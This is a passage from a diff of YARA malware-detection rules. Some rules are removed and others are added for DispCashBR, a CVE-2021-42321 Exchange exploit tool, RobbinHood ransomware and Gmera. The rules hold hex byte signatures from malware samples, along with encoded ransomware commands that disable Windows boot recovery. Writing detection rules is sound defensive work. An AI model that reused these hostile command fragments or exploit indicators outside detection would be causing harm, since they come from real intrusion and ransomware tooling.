ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 b9 00 00 00 8b 46 68 8d 4d a4 83 7d ec 10 57 89 45 a4 8d 45 d8 0f 43 45 d8 33 ff 51 50 6a 00 47 57 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 8a 00 00 00 c6 45 fc 02 33 db 8b 45 e8 8b 4d d0 03 c1 6a 0f 5a 89 5d b8 89 55 bc 88 5d a8 89 7d a4 3b c2 76 15 88 5d a0 8d 4d a8 ff 75 a0 50 e8 78 02 00 00 8b 4d d0 89 5d b8 83 7d d4 10 8d 45 c0 51 0f 43 45 c0 8d 4d a8 50 e8 ca de ff ff 83 7d ec 10 8d 45 d8 ff 75 e8 0f 43 45 d8 8d 4d a8 50 e8 b3 de ff ff 8d 45 a8 50 8d 4e 70 e8 b8 d8 ff ff 8d 4d a8 e8 3f bf ff ff 8d 4d d8 e8 37 bf ff ff 8d 4d c0 e8 2f bf ff ff b0 01 eb 12 8d 4d d8 e8 23 bf ff ff 8d 4d c0 e8 1b bf ff ff 32 c0 e8 3f f1 } + $seq2 = { 8b 75 08 33 ff 8b 55 0c 33 c0 89 b5 68 fb ff ff 89 bd ac fb ff ff c7 85 b0 fb ff ff 07 00 00 00 66 89 85 9c fb ff ff 89 7d fc 39 7a 10 0f 84 da 00 00 00 6a 02 0f 57 c0 8d 8d 84 fb ff ff 58 66 0f 13 85 bc fb ff ff 66 89 85 b4 fb ff ff e8 6e ac ff ff 83 78 14 10 72 02 8b 00 50 ff 15 18 82 41 00 8d 8d 84 fb ff ff 89 85 b8 fb ff ff e8 8f a8 ff ff 68 87 69 00 00 ff 15 0c 82 41 00 bb 01 04 00 00 66 89 85 b6 fb ff ff 53 8d 85 c4 fb ff ff 57 50 e8 fd 2d 00 00 83 c4 0c 8d 7d cc 33 c0 6a 08 59 6a 08 6a 20 f3 ab 8d 45 cc 50 53 8d 85 c4 fb ff ff 50 6a 10 8d 85 b4 fb ff ff 50 ff 15 1c 82 41 00 85 c0 75 45 8d 85 c4 fb ff ff 50 8d 8d 6c fb ff ff e8 7f a8 ff ff 8b d0 c6 45 fc 01 8d 8d 84 fb ff ff e8 26 ab ff ff 50 8d 8d 9c fb ff ff e8 88 bf ff ff 8d 8d 84 fb ff ff e8 c8 c2 ff ff 8d 8d 6c fb ff ff e8 f5 a7 ff ff 8d 85 9c fb } condition: - uint16(0)==0x5a4d and filesize >6KB and 3 of ($s*) + uint16(0)==0x5a4d and filesize >80KB and 10 of ($s*) and 1 of ($seq*) } -rule ARKBIRD_SOLG_MAL_Envyscout_May_2021_1 : FILE +rule ARKBIRD_SOLG_ATM_Dispcashbr_May_2021_1 : FILE { meta: - description = "Detect EnvyScout downloader" + description = "Detect the DispCashBR ATM malware" author = "Arkbird_SOLG" - id = "645f60d1-7c95-515c-a88e-d8528cf8b644" - date = "2021-05-28" - modified = "2021-06-02" + id = "629261d8-242c-580d-aa4d-4b313c77edef" + date = "2020-05-14" + modified = "2021-05-14" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_EnvyScout_May_2021_1.yara#L1-L20" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-14/DispCashBR/ATM_DispCashBR_May_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "7ce4fd18c88f7ea7486c51fc0b673d178bd26ecc2f4a39ec9c5a4a71aaa0daa1" + logic_hash = "26f641a266c1f187d834a05b327c13ddee93747e182a5458e4ec3cb1f23f5f47" score = 75 - quality = 73 + quality = 75 tags = "FILE" - hash1 = "279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11" - hash2 = "9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186" + hash1 = "432f732a4ecbb86cb3dedbfa881f2733d20cbcc5958ead52823bf0967c133175" + hash2 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036" tlp = "White" - adversary = "NOBELIUM" + adversary = "-" strings: - $s1 = "==typeof window&&window.window===window?window:" fullword ascii - $s2 = "==typeof self&&self.self===self?self:" fullword ascii - $s3 = "0===t?t={autoBom:!1}:" fullword ascii - $s4 = "_global.saveAs=saveAs.saveAs=saveAs" fullword ascii - $s5 = "navigator.userAgent" fullword ascii - $s6 = { 6e 65 77 20 42 6c 6f 62 28 5b [1-12] 5d 2c 20 7b 74 79 70 65 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 29 3b 73 61 76 65 41 73 28 } + $seq1 = { c7 45 cc 00 00 00 00 c7 04 24 68 5d 40 00 e8 40 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 89 44 24 04 c7 04 24 89 5d 40 00 e8 0c 0e 00 00 c7 04 24 a4 5d 40 00 e8 18 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 01 45 cc c7 04 24 d0 07 00 00 e8 7d 0e 00 00 83 ec 04 8b 85 a0 fd ff ff 8d 48 0a 0f b7 85 be fd ff ff 0f b7 c0 8d 95 98 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 89 4c 24 08 c7 44 24 04 2e 01 00 00 89 04 24 e8 75 05 00 00 83 ec 14 89 45 e8 8b 45 e8 83 c0 38 83 } + $seq2 = { 0f b7 85 be fd ff ff 0f b7 c0 8b 55 e4 89 54 24 08 c7 44 24 04 06 00 00 00 89 04 24 e8 7e 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 b8 fd ff ff 89 54 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 5f 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 f8 16 00 00 83 ec 14 89 45 e0 8d 85 ac fd ff ff 89 44 24 08 c7 44 24 04 03 00 00 00 c7 04 24 04 00 00 00 e8 dc 16 00 00 83 ec 0c 8b 45 e0 83 c0 38 83 f8 } + $seq3 = { 8b 85 a8 fd ff ff 8b 50 14 8b 85 a8 fd ff ff 8b 40 10 0f af c2 89 45 d8 8b 45 d8 89 44 24 04 c7 04 24 04 5b 40 00 e8 aa 12 00 00 8b 85 a4 fd ff ff 0f b7 40 04 0f b7 c0 89 44 24 04 c7 04 24 24 5b 40 00 e8 8d 12 00 00 8b 85 a8 fd ff ff 8b 50 18 8b 85 a8 fd ff ff 8b 40 1c 0f af c2 89 45 d4 c7 45 f0 00 00 00 00 8b 45 d8 89 44 24 04 c7 04 24 45 5b 40 00 e8 5b 12 00 00 83 45 f0 01 83 7d f0 01 7e e3 8b 85 a0 fd ff ff c7 40 06 01 00 00 00 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 60 ed ff ff 89 45 d0 } + $seq4 = { c7 45 ec 00 00 00 00 8d 85 c4 fd ff ff 89 44 24 04 c7 04 24 03 00 02 0b e8 47 1b 00 00 83 ec 08 89 45 e8 83 7d e8 00 74 18 c7 04 24 92 50 40 00 e8 8b 23 00 00 c7 04 24 ff ff ff ff e8 8f 23 00 00 c7 04 24 aa 50 40 00 e8 8b 23 00 00 c7 04 24 f5 ff ff ff e8 ef 23 00 00 83 ec 04 c7 44 24 04 03 00 00 00 89 04 24 e8 e4 23 00 00 83 ec 08 c7 04 24 b8 0b 00 00 e8 dd 23 00 00 83 ec 04 c7 04 24 c4 50 40 00 e8 4e 23 00 00 8d 85 c4 fd ff ff 83 c0 06 89 44 24 04 c7 04 24 ed 50 40 00 e8 1d 23 00 00 8d 85 c4 fd ff ff 05 07 01 00 00 89 44 24 04 c7 04 24 03 51 40 00 e8 02 23 00 00 0f b7 85 c8 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 1a 51 40 00 e8 e8 22 00 00 0f b7 85 c6 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 2f 51 40 00 e8 ce 22 00 00 0f b7 85 c4 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 42 51 40 00 e8 b4 22 00 00 c7 04 24 54 51 40 00 e8 c0 22 00 00 8d 85 c0 fd ff ff 89 04 24 e8 46 1a 00 00 83 ec 04 8b 85 c0 fd ff ff 8d 95 be fd ff ff 89 54 24 20 c7 44 24 1c 00 00 00 00 8d 95 c4 fd ff ff 89 54 24 18 c7 44 24 14 0f 00 02 0b c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 7f 51 40 00 e8 f9 19 00 00 83 ec 24 89 45 e8 8b 45 e8 83 c0 36 83 f8 } condition: - filesize >100KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >20KB and 3 of ($seq*) } -rule ARKBIRD_SOLG_APT_Puzzlemaker_Launcher_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_EXP_CVE_2021_42321_Nov_2021_1 : CVE_2021_42321 FILE { meta: - description = "Detect the launcher of the PuzzleMaker group" + description = "Detect CVE-2021-42321 exploit tool" author = "Arkbird_SOLG" - id = "ae31d9de-8e6c-5c1b-bc45-bc4e50cea00f" - date = "2021-06-10" - modified = "2021-11-01" - reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Launcher_Jun_2021_1.yara#L1-L19" + id = "2efd58a1-e5c3-5596-b5fd-f6e2fe0ab620" + date = "2021-11-21" + modified = "2021-11-21" + reference = "https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-21/EXP_CVE_2021_42321_Nov_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "5c717ca5c57a86e1b5db45b3d581a45be248d45820c00c40c57a001ac07ce1b2" - score = 75 - quality = 75 - tags = "FILE" - hash1 = "982f7c4700c75b81833d5d59ad29147c392b20c760fe36b200b541a0f841c8a9" - tlp = "White" - adversary = "PuzzleMaker" + logic_hash = "bf45f240875f3c3ab729fe623b6c97d0540c0d7d3e9b2e4beb88af6922f8a643" + score = 50 + quality = 67 + tags = "CVE-2021-42321, FILE" + hash1 = "537744916ce2e78748d301901c679307e8159101f3b194add89f6e1dfbf62c32" + tlp = "white" + level = "Experimental" + adversary = "-" strings: - $s1 = { 4c 89 6d bf 48 8d 45 bf 48 89 44 24 20 4c 8d 0d f9 45 01 00 33 d2 44 8d 42 01 48 8d 0d dc 45 01 00 ff 15 56 44 01 00 8b d8 85 c0 78 c6 4c 89 6d c7 48 8b 45 bf 48 8b 08 4c 8b 79 18 b9 18 00 00 00 e8 9b 04 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 32 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8d 0d 15 fb 01 00 ff 15 cf 43 01 00 48 89 03 48 85 } - $s2 = { 44 89 6c 24 38 4c 89 6c 24 30 c7 44 24 28 03 00 00 00 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 4d c7 ff 15 f6 42 01 00 85 c0 0f 88 bb 01 00 00 48 8d 0d 1d fa 01 00 ff 15 c1 42 01 00 4c 8b f8 48 8d 0d 1b fa 01 00 ff 15 b1 42 01 00 4c 8b e0 4c 89 6d df 48 8b 4d c7 48 8b 11 4c 8b 52 30 4c 89 6c 24 28 48 8d 45 df 48 89 44 24 20 45 33 c9 45 33 c0 49 8b d4 41 ff d2 4c 89 6d e7 48 8b 4d df 48 8b 01 4c 89 6c 24 20 4c 8d 4d e7 45 33 c0 49 8b d7 ff 90 98 00 00 00 4c 89 6d cf 48 8b 4d e7 48 8b 01 4c 8d 45 cf 33 d2 ff 50 78 b8 08 00 00 00 66 89 45 ef 8d 48 10 e8 dc 02 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 33 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8b ce ff 15 14 42 01 00 48 89 03 48 85 c0 75 0e 48 85 } - $s3 = { 4c 8d 05 75 0e 02 00 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 0f b6 d0 42 0f b6 0c 12 66 41 31 08 74 12 ff c0 49 83 c0 02 83 f8 20 72 e7 0f 1f 80 00 00 00 00 0f b7 05 49 09 02 00 48 8d 0d 76 09 02 00 66 d1 e8 66 83 e0 7f 66 0f 6f 15 f3 d4 01 00 66 89 05 2c 09 02 00 0f b7 05 27 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 19 09 02 00 0f b7 05 14 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 06 09 02 00 0f b7 05 01 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f3 08 02 00 0f b7 05 ee 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e0 08 02 00 0f b7 05 db 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 cd 08 02 00 0f b7 05 c8 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 ba 08 02 00 0f b7 05 b5 08 02 00 66 d1 e8 66 83 e0 7f f3 0f 6f 05 bc 08 02 00 66 89 05 9f 08 02 00 0f b7 05 9a 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 8c 08 02 00 0f b7 05 87 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 79 08 02 00 0f b7 05 74 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 66 08 02 00 0f b7 05 61 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 53 08 02 00 0f b7 05 4e 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 40 08 02 00 0f b7 05 3b 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 2d 08 02 00 0f b7 05 28 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 1a 08 02 00 0f b7 05 15 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 07 08 02 00 0f b7 05 02 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f4 07 02 00 0f b7 05 ef 07 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e1 07 02 00 b8 01 00 00 00 66 0f 6e c8 8d 50 05 66 0f d1 c1 66 0f db c2 f3 0f 7f 05 c7 07 02 00 0f } - $s4 = { 48 89 9c 24 60 06 00 00 48 89 b4 24 68 06 00 00 48 89 bc 24 70 06 00 00 4c 89 b4 24 30 06 00 00 c7 05 2e 1a 02 00 04 00 00 00 48 c7 05 27 1a 02 00 01 00 00 00 4c 89 2d 2c 1a 02 00 ff 15 22 48 01 00 48 8d 35 8b 04 02 00 66 66 66 0f 1f 84 00 00 00 00 00 33 d2 44 89 6c 24 70 41 b8 08 03 00 00 48 8d 8d 10 02 00 00 45 8b f5 e8 e4 28 00 00 4c 8d 0d 5d 03 02 00 48 89 74 24 20 ba 84 01 00 00 48 8d 8d 10 02 00 00 49 c7 c0 ff ff ff ff e8 a0 fb ff ff 48 8d 54 24 70 48 8d 8d 10 02 00 00 e8 9f 05 00 00 8b d0 85 } - $s5 = { 4c 89 6c 24 60 4c 8d 05 25 cc 01 00 4c 89 6c 24 58 48 8d 15 e1 04 02 00 4c 89 6c 24 50 41 b9 ff 01 0f 00 4c 89 6c 24 48 48 8b cf 4c 89 6c 24 40 48 89 74 24 38 44 89 6c 24 30 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 ff 15 19 46 01 00 48 8b d8 ff 15 a8 46 01 00 8b f0 48 85 db 74 22 48 8b cb ff 15 20 46 01 00 48 8b cb ff 15 ff 45 01 00 48 8b cf ff 15 f6 45 01 00 bf 01 00 00 } - $s6 = { 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 f4 46 01 00 48 8b f8 48 85 } + $s1 = { 41 41 45 41 41 41 44 2f 2f 2f 2f 2f 41 51 41 41 41 41 41 41 41 41 41 4d 41 67 41 41 41 46 35 4e 61 57 4e 79 62 } + $s2 = "/ews/exchange.asmx" ascii + $s3 = { 48 74 74 70 4e 74 6c 6d 41 75 74 68 28 27 25 73 27 20 25 20 28 55 53 45 52 29 } + $s4 = { 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 45 78 63 68 61 6e 67 65 53 65 72 76 69 63 65 73 43 6c 69 65 6e 74 } + $s5 = { 6d 56 6a 64 45 52 68 64 47 46 51 63 6d 39 32 61 57 52 6c 63 6a 34 4e 43 69 41 67 49 43 41 38 54 32 4a 71 5a 57 4e 30 52 47 46 30 59 56 42 79 62 33 5a 70 5a 47 56 79 49 48 67 36 53 32 56 35 50 53 4a 7a 5a 58 52 4e 5a 58 52 6f 62 32 51 69 49 45 39 69 61 6d 56 6a 64 45 6c 75 63 33 52 68 62 6d 4e 6c 50 53 4a 37 65 44 70 54 64 47 46 30 61 57 4d 67 59 7a 70 44 62 32 35 6d 61 57 64 31 63 6d 46 30 61 57 } condition: - uint16(0)==0x5a4d and filesize >80KB and 5 of ($s*) + filesize >3KB and 4 of them } -rule ARKBIRD_SOLG_APT_Puzzlemaker_Implant_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Robbinhood_Oct_2020_1 : FILE { meta: - description = "Detect the implant of the PuzzleMaker group" + description = "Detect RobbinHood ransomware" author = "Arkbird_SOLG" - id = "9387130c-4474-55bf-9736-09494a5e81b8" - date = "2021-06-10" - modified = "2021-11-01" - reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Implant_Jun_2021_1.yara#L1-L21" + id = "adaacb06-0738-5d2b-b97e-b9007341f743" + date = "2020-11-04" + modified = "2020-11-05" + reference = "https://twitter.com/joakimkennedy/status/1323957238680178689" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-05/RobbinHood/Ran_RobbinHood_Oct_2020_1.yar#L1-L20" license_url = "N/A" - logic_hash = "e54eaaa76b2d370a27a232dee2299266f8b3b82d53da36e35c2a6fcdd7d5b1f7" + logic_hash = "72d0e9b1e2f6aee8f24125e6e6801329e2fad016f05a94ad65c04874a016d09d" score = 75 - quality = 75 + quality = 67 tags = "FILE" - hash1 = "8a17279ba26c8fbe6966ea3300fdefb1adae1b3ed68f76a7fc81413bd8c1a5f6" - hash2 = "1ee9bb4e8bcabe197399b654dbf940438b120af1c376719ff9bdccf2bb1dc606" - hash3 = "f2ce2a00de8673f52d37911f3e0752b8dfab751b2a17e719a565b4083455528e" - tlp = "White" - adversary = "PuzzleMaker" + hash1 = "7c7ef3ab31ab91a7379bc2e3f32473dfa7adf662d0c640ef994103f6022a092b" + hash2 = "f927dd9044d7fa874dc6b98a0f5c9c647f3a9e5393bfe034b425cbf8db93e501" + hash2 = "3f56501f764d49723188bb119845fec4f2419a5080b74513fd0734e2a628e754" strings: - $s1 = { 4c 8d 4c 24 5c 49 8b ce 48 8d 95 c0 00 00 00 ff 15 21 01 04 00 85 c0 74 28 4c 8d 4c 24 58 4c 89 64 24 20 41 b8 00 04 00 00 48 8d 95 c0 04 00 00 49 8b cf ff 15 b5 fe 03 00 85 c0 0f 85 25 ff ff ff ff 15 77 fe 03 00 8b } - $s2 = { 40 55 53 56 41 55 41 57 48 8d ac 24 a0 fe ff ff 48 81 ec 60 02 00 00 48 8b 05 5a 1c 03 00 48 33 c4 48 89 85 30 01 00 00 48 8b 85 b0 01 00 00 4c 8b f9 48 8b b1 b8 00 00 00 4c 8b ad c8 01 00 00 48 83 c6 07 48 89 44 24 60 48 8b 85 d0 01 00 00 48 89 45 98 8b 85 c0 01 00 00 83 c0 fd 48 c1 ee 03 4c 89 4d 80 4c 89 45 88 48 89 55 90 83 f8 06 0f 87 84 03 00 00 48 8d 15 f3 6b fd ff 48 98 8b 8c 82 b0 97 02 00 48 } - $s3 = { 48 8d 1d 98 3d 02 00 0f 57 c0 48 89 bc 24 58 02 00 00 33 c0 c7 44 24 68 01 00 00 00 0f 11 85 80 00 00 00 4c 8b c6 c7 85 8c 00 00 00 10 27 00 00 48 8d 95 a0 00 00 00 48 89 44 24 70 49 8b c9 48 89 44 24 78 0f 11 45 20 0f 11 45 30 0f 11 45 40 0f 11 45 50 0f 11 45 60 0f 11 45 70 0f 11 85 90 00 00 00 e8 57 58 fe ff 8b f8 85 c0 0f 85 62 02 00 00 49 8b 87 b8 00 00 00 48 8d 4c 24 68 48 8b 54 24 60 48 83 c0 07 48 c1 e8 03 4c 89 a4 24 50 02 00 00 4c 8b a5 b8 01 00 00 4c 3b e0 4c 89 b4 24 48 02 00 00 4d 8b f4 4c 0f 47 f0 4d 8b c6 e8 1b 57 fe ff 8b f8 85 c0 75 54 49 8b 87 b8 00 00 00 4a 8d 14 f5 00 00 00 00 48 } - $s4 = { 85 ff 0f 85 cd 01 00 00 48 8b 4d 90 48 8d 45 a0 48 89 44 24 50 45 33 c9 48 8d 45 d0 4d 8b c7 48 89 44 24 48 33 d2 4c 89 64 24 40 4c 89 64 24 38 c7 44 24 30 00 00 00 08 c7 44 24 28 01 00 00 00 4c 89 64 24 20 ff 15 62 1c 04 00 85 c0 75 3a ff 15 38 1d 04 00 44 8b c3 48 8b ce 8b d0 8b f8 e8 d1 09 00 00 48 8b 4d 80 ff 15 07 1d 04 00 48 8b 4d 88 ff 15 fd 1c 04 00 48 8b 4d 90 ff 15 f3 1c 04 00 } - $s5 = { 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec 28 02 00 00 48 8b 05 5d 0a 04 00 48 33 c4 48 89 84 24 10 02 00 00 48 8b ac 24 90 02 00 00 0f 57 c0 4c 8b ac 24 98 02 00 00 33 db 45 32 e4 4c 89 4c 24 58 4c 89 44 24 70 49 8b f9 48 89 6c 24 68 4d 8b c8 4c 89 6c 24 60 4c 8b fa 48 8b f1 44 8b f3 0f 11 84 24 e0 00 00 00 c7 84 24 ec 00 00 00 10 27 00 00 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 0f 11 84 24 c0 00 00 00 0f 11 84 24 d0 00 00 00 0f 11 84 24 f0 00 00 00 48 85 ed 75 47 4c 8b 81 b8 00 00 00 48 8d 05 a1 c2 ff ff 48 89 44 24 68 48 8d 8c 24 80 00 00 00 49 83 c0 07 48 8d 84 24 80 00 00 00 49 c1 e8 03 49 8b d1 48 89 44 24 60 e8 87 c2 ff ff 8b f8 85 c0 0f 85 ee 01 00 00 48 8b 7c 24 58 48 8d 56 68 48 8d 4f 18 e8 7b 4a ff ff 85 c0 75 15 48 8d 56 50 48 8b cf e8 6b 4a ff ff 85 c0 75 05 40 b5 } - $s6 = { 41 b9 01 00 00 00 c7 44 24 20 00 00 00 f0 45 33 c0 48 8d 4c 24 60 33 d2 ff 15 11 06 04 00 85 c0 74 28 48 8b 4c 24 60 4c 8d 85 b0 00 00 00 ba 20 00 00 00 ff 15 ee 05 04 00 48 8b 4c 24 60 33 d2 85 } + $seq = { 20 21 3d 20 20 3c 3d 3d 20 61 73 20 20 61 74 20 20 66 70 3d 20 69 73 20 20 6c 72 3a 20 6f 66 20 20 6f 6e 20 20 70 63 3d 20 73 70 3a 20 73 70 3d 25 76 0d 0a 29 20 3d 20 29 20 6d 3d 2b 49 6e 66 2c 20 6e 20 2d 49 6e 66 2e 62 61 74 2e 63 6d 64 2e 63 6f 6d 2e 65 78 65 2f 50 49 44 31 30 36 30 33 31 32 35 3a 20 70 3d 41 43 44 54 41 43 53 54 41 45 44 54 41 45 53 54 41 4b 44 54 41 4b 53 54 41 57 53 54 41 68 6f 6d 41 74 6f 69 43 45 53 54 43 68 61 6d 44 61 73 68 45 45 53 54 47 4f 47 43 4a 75 6c 79 4a 75 6e 65 4c 69 73 75 4d 32 52 74 4d 32 52 7a 4d 32 5a 79 4d 32 63 79 4d 32 64 77 4d 33 42 79 4d 69 61 6f 4d 6f 64 69 4e 33 6f 3d 4e 5a 44 54 4e 5a 53 54 4e 65 77 61 4e 6a 41 79 51 56 4a 44 51 56 5a 51 53 41 53 54 53 74 61 74 54 55 31 54 54 68 61 69 54 6b 56 47 55 46 42 55 57 45 53 54 57 45 78 54 59 32 31 30 59 32 31 6b 59 32 35 6d 59 32 46 69 59 32 46 7a 59 32 4d 3d 59 32 52 34 59 32 52 6d 59 32 52 79 59 32 55 78 59 32 55 79 59 32 56 79 59 32 5a 6e 59 32 5a 77 59 32 5a 79 59 32 64 74 59 32 68 74 59 32 6c 69 59 32 78 7a 59 33 42 70 59 33 42 77 59 33 49 79 59 33 4a 30 59 33 4a 33 59 33 4d 3d 59 33 4e 32 59 33 4e 6f 59 33 4e 73 59 33 4e 79 59 33 4e 7a 59 33 52 6d 59 57 39 70 59 57 46 6a 59 57 49 30 59 57 4a 72 59 57 4e 30 59 57 4e 6f 59 57 4e 77 59 57 4e 79 59 57 52 69 59 57 52 70 59 57 52 77 59 57 52 7a 59 57 56 7a 59 57 6b 3d 59 57 6c 30 59 57 6c 6d 59 57 70 73 59 57 77 3d 59 58 42 71 59 58 42 72 59 58 4a 33 59 58 4e 30 59 58 4e 34 59 58 4e 6a 59 58 4e 6d 59 58 4e 74 59 58 4e 77 59 58 5a 70 59 58 64 6e 59 6d 31 77 59 6d 46 30 59 6d 46 35 59 6d 46 6a 59 6d 46 72 59 6d 46 79 59 6d 4d 32 59 6d 4d 33 59 6d 4e 76 59 6d 52 69 59 6d 5a 6d 59 6d 64 30 59 6d 6c 6e 59 6d 6c 72 59 6d 6c 75 59 6d 74 36 59 6d 74 6d 59 6d 74 77 59 6e 42 33 59 6e 4a 6b 59 6e 4e 68 59 6e 56 77 59 6e 6f 79 59 77 3d 3d 5a 32 38 3d 5a 32 46 74 5a 32 52 69 5a 32 68 76 5a 32 6c 6d 5a 33 42 6e 5a 33 4a 35 5a 33 6f 3d 5a 47 31 77 5a 47 35 6e 5a 47 39 30 5a 47 39 6a 5a 47 46 30 5a 47 46 6a 5a 47 46 7a 5a 47 49 3d 5a 47 49 77 5a 47 49 7a 5a 47 4a 34 5a 47 4a 68 5a 47 4a 6d 5a 47 4d 79 5a 47 4e 6f 5a 47 4e 79 5a 47 4e 7a 5a 47 52 6b 5a 47 52 7a 5a 47 56 74 5a 47 56 79 5a 47 56 7a 5a 47 5a 7a 5a 47 64 6a 5a 47 6c 30 5a 47 6c 6d 5a 47 6c 74 5a 47 6c 77 5a 47 6c 79 5a 47 70 32 5a 48 4a 33 5a 48 4a 6d 5a 48 4e 30 5a 48 4e 69 5a 48 4e 72 5a 48 52 6b 5a 48 64 6d 5a 48 64 6e 5a 48 64 7a 5a 48 68 30 5a 48 68 34 5a 48 68 69 5a 48 68 6d 5a 48 68 6e 5a 57 31 73 5a 57 52 69 5a 58 42 72 5a 58 42 7a 5a 58 4a 6d 5a 58 4e 74 5a 58 68 6d 5a 6d 31 69 5a 6d 39 7a 5a 6d 4a 33 5a 6d 52 69 5a 6d 59 3d 5a 6d 5a 6b 5a 6d 5a 6d 5a 6d 67 3d 5a 6d 68 6b 5a 6d 78 32 5a 6d 78 68 5a 6d 78 6d 5a 6e 42 34 5a 6e 42 72 5a 6e 4a 74 5a 6e 4e 6f 5a 6e 56 73 5a 6e 68 6e 0a 09 6d 3d 5d } + $com1 = "os/exec.(*Cmd).Run" fullword ascii + $com2 = "os/exec.(*Cmd).Start" fullword ascii + $com3 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 31 2e 76 62 73 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 32 2e 76 62 73 43 } + $str1 = { 63 6d 64 7a 63 7a 4e 68 63 73 } + $str2 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 69 62 32 39 30 63 33 52 68 64 48 56 7a 63 47 39 73 61 57 4e 35 49 47 6c 6e 62 6d 39 79 5a 57 46 73 62 47 5a 68 61 57 78 31 63 6d 56 7a } + $str3 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 79 5a 57 4e 76 64 6d 56 79 65 57 56 75 59 57 4a 73 5a 57 51 67 62 6d 38 3d } condition: - uint16(0)==0x5a4d and filesize >80KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >600KB and $seq and 2 of ($com*) and 2 of ($str*) } -rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Shellcode_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Gmera_June_2021_1 : FILE { meta: - description = "Detect Kimsuky shellcode used in fake PDF against South Korea" + description = "Detect Gmera malware" author = "Arkbird_SOLG" - id = "0b8d514b-82b6-5106-a87a-0890be1850d5" - date = "2021-08-03" - modified = "2021-08-04" - reference = "Internal Research" - 